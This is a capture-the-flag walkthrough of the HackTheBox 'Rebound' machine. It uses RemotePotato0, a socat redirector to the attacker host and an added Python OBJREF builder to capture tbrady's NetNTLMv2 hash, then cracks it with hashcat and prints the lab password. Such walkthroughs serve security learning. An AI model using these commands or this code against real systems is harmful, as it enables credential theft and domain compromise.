RemotePotato0


During the earlier BloodHound enumeration, the tbrady user was suspected to have an active session on the DC host. While that finding alone does not guarantee a path to lateral movement, it gives an attacker a reason to look more closely at the session, which could turn out to be exploitable.

While researching online, I found the tool below, which appears to fit the current assessment because of the active user session.

  • DCOM
    • Distributed Component Object Model (DCOM) is Microsoft's protocol for creating remote objects, called COM objects, and calling their methods.
    • It is implemented on top of MSRPC.
  • OXID Resolution
    • OXID resolution is the process of obtaining the remote procedure call (RPC) binding information that is required to communicate with the object exporter.
    • You can think of it as a DNS for finding COM objects.
  • Marshalled COM objects
    • Marshalling is like serialization.
    • COM objects can be marshalled to be sent over the network; the marshalled form carries the bindings needed to reach the object's OXID Resolver.
  • Session 0
    • Each user who logs into a Windows machine gets a new session.
    • Session 0 is the initial session created at startup; it is not interactive and mostly runs services. The user the attack ends up impersonating is the one logged into the first interactive session (here, tbrady).

The vulnerability is present due to the following:

  1. User impersonation. When a COM object with certain vulnerable CLSIDs is created in session 0 in Windows, the local COM server, which creates the object, impersonates the user who is logged in on that computer's first interactive session.
  2. COM marshalling. Marshalled COM objects in Windows can contain a field which specifies the bindings for the OXID Resolver. The process of unmarshalling a COM object includes asking the OXID Resolver for the COM object's RPC bindings, so an attacker who controls those bindings controls where the impersonating server authenticates.

additional info

Compiling


PS C:\Users\tacticalgator\source\repos> git clone https://github.com/antonioCoco/RemotePotato0.git ; cd RemotePotato0
Cloning into 'RemotePotato0'...
remote: Enumerating objects: 154, done.
remote: Counting objects: 100% (60/60), done.
remote: Compressing objects: 100% (27/27), done.
Receiving objects: 100% (154/154), 21.29 MiB | 7.37 MiB/s, done.
remote: Total 154 (delta 42), reused 33 (delta 33), pack-reused 94
Resolving deltas: 100% (82/82), done.
 
PS C:\Users\tacticalgator\source\repos\RemotePotato0> start .\RemotePotato0.sln

I clone the exploit and open the solution in Visual Studio.

According to the documentation, the matching Windows SDK would be 10.0.17763.0, since the target system is Windows 10 Version 1809 (build 17763). However, the lowest Windows SDK I have installed is 10.0.19041.0. The project only needs the SDK's headers and IDL files, so a newer SDK should be backward-compatible for this build.

Build started...
1>------ Build started: Project: RemotePotato0, Configuration: Release x64 ------
1>64 bit Processing .\IStandardActivator.idl
1>IStandardActivator.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\oaidl.idl
1>oaidl.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\objidl.idl
1>objidl.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\unknwn.idl
1>unknwn.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\wtypes.idl
1>wtypes.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\wtypesbase.idl
1>wtypesbase.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\basetsd.h
1>basetsd.h
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\guiddef.h
1>guiddef.h
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\ocidl.idl
1>ocidl.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\oleidl.idl
1>oleidl.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\servprov.idl
1>servprov.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\urlmon.idl
1>urlmon.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\msxml.idl
1>msxml.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\oaidl.acf
1>oaidl.acf
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\ocidl.acf
1>ocidl.acf
1>64 bit Processing .\RogueOxidResolver.idl
1>RogueOxidResolver.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\oaidl.idl
1>oaidl.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\objidl.idl
1>objidl.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\unknwn.idl
1>unknwn.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\wtypes.idl
1>wtypes.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\wtypesbase.idl
1>wtypesbase.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\basetsd.h
1>basetsd.h
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\guiddef.h
1>guiddef.h
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\ocidl.idl
1>ocidl.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\oleidl.idl
1>oleidl.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\servprov.idl
1>servprov.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\urlmon.idl
1>urlmon.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\msxml.idl
1>msxml.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\oaidl.acf
1>oaidl.acf
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\ocidl.acf
1>ocidl.acf
1>HTTPCrossProtocolRelay.cpp
1>IStorageTrigger.cpp
1>RelayLib.cpp
1>RemotePotato0.cpp
1>RogueOxidResolver.cpp
1>RPCCaptureServer.cpp
1>RogueOxidResolver_s.c
1>Generating code
1>Previous IPDB not found, fall back to full compilation.
1>All 184 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
1>Finished generating code
1>RemotePotato0.vcxproj -> C:\Users\tacticalgator\source\repos\RemotePotato0\x64\Release\RemotePotato0.exe
========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ==========

Build complete

Execution


PS C:\Users\tacticalgator\source\repos\RemotePotato0\x64\Release\> scp .\RemotePotato0.exe kali@kali:~/archive/htb/labs/rebound/
RemotePotato0.exe                                                   100%  184KB   7.3MB/s   00:00
 
*evil-winrm* PS C:\Users\winrm_svc\Documents> upload RemotePotato0.exe C:\Users\winrm_svc\Documents
 
info: Uploading /home/kali/archive/htb/labs/rebound/RemotePotato0.exe to C:\Users\winrm_svc\Documents
data: 250536 bytes of 250536 bytes copied
info: Upload successful!

Delivery complete

*evil-winrm* PS C:\Users\winrm_svc\Documents> .\RemotePotato0.exe
 
 
	RemotePotato0
	@splinter_code & @decoder_it
 
 
 
mandatory args:
-m module
	allowed values:
	0 - Rpc2Http cross protocol relay server + potato trigger (default)
	1 - Rpc2Http cross protocol relay server
	2 - Rpc capture (hash) server + potato trigger
	3 - Rpc capture (hash) server
 
 
other args: (someone could be mandatory and/or optional based on the module you use)
-r Remote HTTP relay server ip
-t Remote HTTP relay server port (Default 80)
-x Rogue Oxid Resolver ip (default 127.0.0.1)
-p Rogue Oxid Resolver port (default 9999)
-l RPC Relay server listening port (Default 9997)
-s Session id for the Cross Session Activation attack (default disabled)
-c CLSID (Default {5167B42F-C111-47A1-ACC4-8EABE61B0B54})

While RemotePotato0 supports relaying the NTLM authentication to other protocols such as LDAP, I only need to capture the authentication hash, so module 2 is enough. Because the target build is too new for the JuicyPotato technique (since Windows 10 1809 / Server 2019 the OXID Resolver can no longer be served locally on an arbitrary port), the Rogue OXID Resolver has to be reached through a remote redirector, as with RoguePotato.

*evil-winrm* PS C:\Users\winrm_svc\Documents> .\RemotePotato0.exe -m 2
[!] Detected a Windows Server version not compatible with JuicyPotato, you cannot run the RogueOxidResolver on 127.0.0.1. RogueOxidResolver must be run remotely.
[!] example network redirector:
	sudo socat -v tcp-listen:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999

As expected, RemotePotato0 reports that the target build is not compatible with the JuicyPotato approach and that the Rogue OXID Resolver has to be reached remotely.

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ socat -v tcp-listen:135,fork,reuseaddr TCP:$IP:9999

Setting up the socat redirector on Kali: connections to port 135 (where the victim's RPCSS expects the OXID Resolver) are forwarded to the Rogue OXID Resolver that RemotePotato0 will open on the target's port 9999 ($IP is the target).

*evil-winrm* PS C:\Users\winrm_svc\Documents> .\RemotePotato0.exe -m 2 -x 10.10.14.17 -p 9999
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (null) to your victim machine on port 9999
[*] example network redirector:
	sudo socat -v tcp-listen:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] Calling CoGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...

Running RemotePotato0 with the command above calls CoGetInstanceFromIStorage() with the vulnerable CLSID {5167B42F-C111-47A1-ACC4-8EABE61B0B54} and passes it a marshalled IStorage object whose OXID bindings point at the attacker's Rogue OXID Resolver. The breakdown:

  • This marshals the IStorage COM object, instantiates the privileged COM server (which impersonates the user of the existing interactive session, tbrady), and has that server unmarshal the object in its own security context.
  • Unmarshalling the IStorage object triggers an OXID resolution request to the Rogue OXID Resolver.

The socat redirector set up earlier receives that OXID resolution request on port 135 and forwards it to RemotePotato0's Rogue OXID Resolver listening on 127.0.0.1:9999 on the target. The rogue resolver answers with RPC bindings that point to RemotePotato0's RPC capture server on 127.0.0.1:9997. The privileged COM server, still impersonating tbrady, then starts NTLM authentication against that capture server, and its NetNTLMv2 response is captured.
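The two binding hops described above (the marshalled object's OXID Resolver bindings, and the rogue resolver's answer) are easier to reason about with the bytes in hand. The following is an added example, not code from RemotePotato0 or from this writeup: it encodes the OBJREF_STANDARD blob that an IStorage trigger hands to CoGetInstanceFromIStorage and parses it back, following the MS-DCOM layouts for OBJREF, STDOBJREF and DUALSTRINGARRAY. The attacker address ROGUE_IP and the capture binding CAPTURE_BINDING (the tool's -l default, 9997) are assumptions for the lab; the OXID, OID and IPID values are placeholders.

```python
"""OBJREF / DUALSTRINGARRAY round trip for a RemotePotato0-style trigger.

Added example (not RemotePotato0's own code). Encodes the OBJREF_STANDARD blob
that an IStorage trigger returns from MarshalInterface and parses it back, so
both binding hops of the attack can be inspected:
  hop 1: the OBJREF's DUALSTRINGARRAY sends the victim's RPCSS to the rogue
         OXID resolver (ROGUE_IP, assumed; RPCSS contacts it on tcp/135);
  hop 2: the rogue resolver's ResolveOxid2 reply sends the impersonating COM
         server to the RPC capture port (CAPTURE_BINDING, assumed -l default).
Layout per MS-DCOM: OBJREF 2.2.18, STDOBJREF 2.2.18.4, DUALSTRINGARRAY 2.2.19.
"""
import struct
import uuid

MEOW = b"MEOW"                  # OBJREF signature
OBJREF_STANDARD = 0x00000001    # OBJREF.flags: STDOBJREF + resolver bindings follow
NCACN_IP_TCP = 0x07             # STRINGBINDING.wTowerId for TCP/IP
RPC_C_AUTHN_WINNT = 0x0A        # SECURITYBINDING.wAuthnSvc: NTLM
IID_IUNKNOWN = uuid.UUID("00000000-0000-0000-c000-000000000046")

ROGUE_IP = "10.10.14.17"              # assumed: attacker host running the socat redirector
CAPTURE_BINDING = "127.0.0.1[9997]"   # assumed: RemotePotato0 RPC capture server (-l default)


def _wstr(s: str) -> bytes:
    """NUL-terminated UTF-16LE string, the form used inside DUALSTRINGARRAY."""
    return s.encode("utf-16-le") + b"\x00\x00"


def dual_string_array(addr: str, authn_svc: int = RPC_C_AUTHN_WINNT) -> bytes:
    """One TCP STRINGBINDING plus one NTLM SECURITYBINDING; each array is NUL-terminated."""
    strings = struct.pack("<H", NCACN_IP_TCP) + _wstr(addr) + b"\x00\x00"
    security = struct.pack("<HH", authn_svc, 0xFFFF) + _wstr("") + b"\x00\x00"
    num_entries = (len(strings) + len(security)) // 2   # counted in 16-bit units
    sec_offset = len(strings) // 2                      # where the security array starts
    return struct.pack("<HH", num_entries, sec_offset) + strings + security


def build_objref(resolver_addr: str, oxid: int = 0x1122334455667788) -> bytes:
    """OBJREF_STANDARD whose OXID the victim can only resolve by asking resolver_addr."""
    std = struct.pack("<IIQQ", 0, 1, oxid, 0x0102030405060708)   # flags, cPublicRefs, OXID, OID
    std += uuid.uuid4().bytes_le                                  # IPID: any value works for the trigger
    return (MEOW + struct.pack("<I", OBJREF_STANDARD) + IID_IUNKNOWN.bytes_le
            + std + dual_string_array(resolver_addr))


def _read_wstr(buf: bytes, pos: int):
    end = pos
    while buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[pos:end].decode("utf-16-le"), end + 2


def parse_dual_string_array(buf: bytes, pos: int = 0) -> dict:
    num_entries, sec_offset = struct.unpack_from("<HH", buf, pos)
    base = pos + 4
    bindings, p = [], base
    while True:
        tower = struct.unpack_from("<H", buf, p)[0]
        p += 2
        if tower == 0:                 # end of aStringArray
            break
        addr, p = _read_wstr(buf, p)
        bindings.append((tower, addr))
    security, p = [], base + sec_offset * 2
    while True:
        authn = struct.unpack_from("<H", buf, p)[0]
        p += 2
        if authn == 0:                 # end of aSecurityArray
            break
        p += 2                         # reserved word (0xFFFF)
        princ, p = _read_wstr(buf, p)
        security.append((authn, princ))
    return {"entries": num_entries, "bindings": bindings, "security": security}


def parse_objref(blob: bytes) -> dict:
    if blob[:4] != MEOW:
        raise ValueError("not an OBJREF")
    flags = struct.unpack_from("<I", blob, 4)[0]
    if flags != OBJREF_STANDARD:
        raise ValueError("only OBJREF_STANDARD is handled here")
    iid = uuid.UUID(bytes_le=blob[8:24])
    _stdflags, refs, oxid, oid = struct.unpack_from("<IIQQ", blob, 24)
    ipid = uuid.UUID(bytes_le=blob[48:64])
    return {"iid": str(iid), "refs": refs, "oxid": oxid, "oid": oid,
            "ipid": str(ipid), "resolver": parse_dual_string_array(blob, 64)}


def oxid_resolution_hops() -> list:
    """Addresses the victim contacts, in order: rogue resolver, then capture server."""
    trigger = parse_objref(build_objref(ROGUE_IP))
    hop1 = trigger["resolver"]["bindings"][0][1]
    reply = parse_dual_string_array(dual_string_array(CAPTURE_BINDING))
    hop2 = reply["bindings"][0][1]
    return [hop1, hop2]


if __name__ == "__main__":
    print(build_objref(ROGUE_IP).hex())
    print(oxid_resolution_hops())
```

Hop 1 carries only a host address, because RPCSS always talks to the OXID Resolver on port 135; that is why the socat redirector has to listen on 135 and cannot be replaced by pointing the binding at another port. Hop 2 can name a port explicitly, which is how the rogue resolver steers the impersonating server to 127.0.0.1:9997.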

tbrady::rebound:d9e2170d79785349:6603574f8fe626e576a92a95b90fa8ea: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

There is the captured NetNTLMv2 authentication for tbrady. With module 2 the response is captured rather than relayed, which is what is needed for offline cracking.

Password Cracking


┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ hashcat -a 0 -m 5600 tbrady.hash /usr/share/wordlists/rockyou.txt       
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
TBRADY::rebound:d9e2170d79785349:6603574f8fe626e576a92a95b90fa8ea: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:543BOMBOMBUNmanda
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TBRADY::rebound:d9e2170d79785349:6603574f8fe626e576...000000
Time.Started.....: Tue Sep 12 20:27:06 2023 (5 secs)
Time.Estimated...: Tue Sep 12 20:27:11 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2244.5 kH/s (0.85ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 12192768/14344385 (85.00%)
Rejected.........: 0/12192768 (0.00%)
Restore.Point....: 12189696/14344385 (84.98%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 5440166 -> 54238426
Hardware.Mon.#1..: Util: 60%
 
Started: Tue Sep 12 20:26:43 2023
Stopped: Tue Sep 12 20:27:12 2023

The hash cracked; tbrady's password is 543BOMBOMBUNmanda.

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-getTGT rebound.htb/tbrady@dc01.rebound.htb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
password: 543BOMBOMBUNmanda
[*] Saving ticket in tbrady@dc01.rebound.htb.ccache

Validated: the password is correct and a TGT for tbrady was obtained.